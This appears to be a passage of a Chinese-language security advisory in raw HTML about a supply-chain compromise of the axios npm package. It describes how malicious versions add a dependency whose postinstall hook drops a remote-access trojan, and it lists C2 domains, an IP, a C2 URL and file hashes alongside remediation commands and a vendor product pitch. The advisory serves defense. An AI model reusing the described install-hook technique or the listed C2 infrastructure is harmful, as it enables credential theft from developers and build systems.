data-type="png" data-w="1106" style="width: 100%;" type="block" data-backw="546" data-backh="760" data-imgfileid="100027881" src="https://wechat2rss.xlab.app/img-proxy/?k=33603103&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwUAAPY3kTqeXyLBbiccW5Oyxgz2O8NRM8vLmAPff7h4Iql75u3HkVa1knM94Vicew9989XfZexQU0CjPFiaIvSO31SOyMbI8ibeovY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-line="13" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">攻击者劫持了 Axios 维护者的 npm 账号，篡改账号注册邮箱，绕过项目正常的 GitHub Actions CI/CD 发布流程，通过 npm CLI 手动发布了两个恶意版本：axios@1.14.1 和 axios@0.30.4。 这两个版本的 Axios 源码本身没有被篡改。攻击者的手法更为隐蔽——在 package.json 中新增了一条名为 plain-crypto-js@4.2.1 的依赖。该依赖在 Axios 代码中从未被引用，它的唯一目的就是在 npm install 时触发 postinstall 钩子，执行经过双层混淆的 Dropper 脚本，进而向系统中投放跨平台 RAT 木马。 为了降低被安全工具识别的概率，攻击者做了充分的准备工作：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">在发布恶意版本前约 18 小时，先用同一账号发布了一个无毒的 plain-crypto-js@4.2.0（完整复制合法的 crypto-js 源码），为账号建立发布记录，规避&#34;零历史新包&#34;的告警规则；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">恶意 Dropper 采用运行时解密、动态模块加载等手段绕过静态分析和 AST 扫描；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">执行完成后会自行替换 package.json 并删除痕迹，阻碍事后取证。</span></p></li></ul><h2 data-line="20" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 16px auto;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;line-height: 1.75em;"><span leaf="">受影响范围</span></h2><p data-line="21" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">RAT 木马覆盖三个平台，具备完整的远程控制能力：</span></p><p style="text-align: center;line-height: 1.75em;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027883" data-ratio="0.5907407407407408" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=929e5903&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwWjS6icmFia92nhbX9DNWG6mbiasxtAgXbr6pCps3aJJibs3p7touPfO6p416mCibia8YhLTkiavuPZzXgzxHVTTIyLb9nFsa73r7J8FI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">直接受影响</span></strong><span leaf="">：所有安装了 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">axios@1.14.1</span></code><span leaf=""> 或 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">axios@0.30.4</span></code><span leaf=""> 的 Node.js 项目及其运行环境</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">CI/CD 流水线</span></strong><span leaf="">：任何在上述版本存在期间执行过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">npm install</span></code><span leaf=""> / </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">npm update</span></code><span leaf=""> 且未锁定版本的自动化构建任务</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">凭据泄露风险</span></strong><span leaf="">：安装时环境中可访问的所有凭据均应视为已泄露，包括但不限于：</span></p></li><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">npm access token</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">AWS / GCP / Azure 云平台密钥</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">SSH 私钥</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">CI/CD secrets（如 GitHub Actions secrets）</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.env</span></code><span leaf=""> 文件中的所有敏感值</span></p></li></ul><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">潜在规模</span></strong><span leaf="">：axios 每周下载量超 1 亿次，即使恶意版本存在时间短暂，潜在受害者数量仍极为可观</span></p></li></ul><p data-line="39" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">影响版本</span></strong></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">axios (npm) == 0.30.4</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">axios (npm) == 1.14.1</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">plain-crypto-js (npm) == 4.2.1</span></p></li></ul><p data-line="44" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">安全版本</span></strong></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">axios (npm) &lt;= 0.30.3</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">axios (npm) &lt;= 1.14.0</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">axios (npm) &gt; 0.30.4</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">axios (npm) &gt; 1.14.1</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">plain-crypto-js (npm) 恶意包已被 npm 官方下架</span></p></li></ul><h2 data-line="51" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 16px auto;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;line-height: 1.75em;"><span leaf="">IOC 列表</span></h2><p style="max-width: 100%;overflow-x: auto;margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin-right: auto;margin-left: auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);min-width: 174px;"><thead><tr><th data-colwidth="149" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">类型</span></span></p></th><th align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">值</span></span></p></th></tr></thead><tbody><tr><td data-colwidth="149" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">C2 域名</span></span></p></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">sfrclak.com</span></span></p></td></tr><tr><td data-colwidth="149" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">C2 IP</span></span></p></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">142.11.206.73</span></span></p></td></tr><tr><td data-colwidth="149" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">关联域名</span></span></p></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">callnrwise.com</span></span></p></td></tr><tr><td data-colwidth="149" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">C2 URL</span></span></p></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><span textstyle="" style="font-size: 12px;"><a href="http://sfrclak.com:8000/6202033" target="_blank">http://sfrclak.com:8000/6202033</a></span></span></code></td></tr><tr><td data-colwidth="149" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">MD5</span></span></p></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span leaf=""><span textstyle="" style="font-size: 12px;">04e3073b3cd5c5bfcde6f575ecf6e8c1</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">9663665850cdd8fe12e30a671e5c4e6f</span></span></p></td></tr></tbody></table></p><h2 data-line="60" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 16px auto;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;line-height: 1.75em;"><span leaf="">紧急处置建议</span></h2><h3 data-line="61" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 8px 8px 8px 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.75em;"><span leaf="">降级 axios 至安全版本并锁定</span></h3><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span style="font-size: 11px;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">bash</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="bash" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 1.x 用户</span></span></p><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span leaf="">npm install axios@1.14.0</span></p><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 0.x 用户</span></span></p><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span leaf="">npm install axios@0.30.3</span></p></code></pre></div><h3 data-line="69" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 8px 8px 8px 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.75em;"><span leaf="">在 package.json 中添加 overrides，防止传递依赖解析回恶意版本</span></h3><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span style="font-size: 11px;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">bash</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="bash" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span leaf="">{</span></p><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;dependencies&#34;</span></span><span leaf="">: { </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;axios&#34;</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;1.14.0&#34;</span></span><span leaf=""> },</span></p><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;overrides&#34;</span></span><span leaf="">:    { </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;axios&#34;</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;1.14.0&#34;</span></span><span leaf=""> },</span></p><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;resolutions&#34;</span></span><span leaf="">:  { </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;axios&#34;</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;1.14.0&#34;</span></span><span leaf=""> }</span></p><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span leaf="">}</span></p></code></pre></div><h3 data-line="78" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 8px 8px 8px 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.75em;"><span leaf="">删除 plain-crypto-js 并重新安装（禁用脚本）：</span></h3><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">rm</span></span><span leaf=""> -rf node_modules/plain-crypto-js</span></p><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span leaf="">npm install --ignore-scripts</span></p></code></pre></p><h3 data-line="84" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 8px 8px 8px 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.75em;"><span leaf="">使用腾讯iOA开展全盘查杀</span></h3><p data-line="85" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">目前腾讯iOA已支持对相关恶意文件实施查杀，用户可通过iOA配置快速查杀策略，对全网终端下发全盘扫描任务，自动隔离病毒文件。<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5222222222222223" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin-right: auto;margin-left: auto;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027880" src="https://wechat2rss.xlab.app/img-proxy/?k=ab0000f1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwXXGbAH3gCXRESKmzd87CpzDthfibdHibpbCviaTCNG7bv0aQvV3RKTvzn2dhw3Q9ibLCd0Ssl1LqZz9ELy2Vx4mPD6OOnME3QicSX0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5064814814814815" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin-right: auto;margin-left: auto;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027877" src="https://wechat2rss.xlab.app/img-proxy/?k=da3ed12f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwWR1CBmF1aJg67JAKcq47u9JJ1eu1ticIVdLP6Z1I4WHJfxeLvh2Vdt3xicAvsoiaSWRuEB2ubhjojeriaFzcib2qeTgIFtpukNvh90%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/>除了病毒查杀以外，您还可以通过腾讯iOA-EDR实现外联拦截、精准威胁溯源。</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">C2外联拦截（默认包含，无需用户手动配置）</span></strong></p></li></ul><p data-line="91" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">EDR内置规则包含威胁联网自动处置，终端基于威胁情报引擎，发现联网的域名或IP指向威胁情报，会自动处置拦截，并产生告警。</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">威胁告警排查</span></strong></p></li></ul><p data-line="95" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">EDR威胁告警，攻击详情筛选 “sfrclak.com”，排查相关告警信息。<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.33240740740740743" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin-right: auto;margin-left: auto;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027878" src="https://wechat2rss.xlab.app/img-proxy/?k=47f18bc8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwXMr88tsyVJQfKEAC4Ej8vjPOoVsZZeBEolIryA53R1bB3jRoAvLB77Ig2QxrQZWJmEJvwFT3U3rKcsHc3ibvQv5K4U6vPmoIj4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">威胁狩猎</span></strong></p></li></ul><p data-line="100" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">通过EDR威胁狩猎，选择筛选条件网络事件-&gt;目标信息-域名-&gt;包含 sfrclak.com；或者执行</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">SELECT * FROM NetworkEvents WHERE Child.Host = &#39;sfrclak.com&#39; ORDER BY Common.EventTime DESC</span></code><span leaf=""> 查看有无历史访问IOC的连接记录。<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.32407407407407407" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin-right: auto;margin-left: auto;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027879" src="https://wechat2rss.xlab.app/img-proxy/?k=62484154&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwXv2sBFk1eF3Dn776aVZcWnOKwbwvmXccjCd68wm8TX9KOQNXGkts1wj6xpYfvBfPfB7b6Z0jd06v7wnxdNibx73byDPPHWAnibI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><h3 data-line="107" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 8px 8px 8px 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.75em;"><span leaf="">若发现 RAT 文件</span></h3><p data-line="108" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">不要原地清理，直接从已知干净状态重建系统。</span></p><h3 data-line="110" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 8px 8px 8px 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.75em;"><span leaf="">凭据轮换</span></h3><p data-line="111" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">对所有曾运行恶意版本的系统，立即轮换以下凭据：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">npm access token</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">AWS / GCP / Azure 访问密钥</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">SSH 私钥</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: 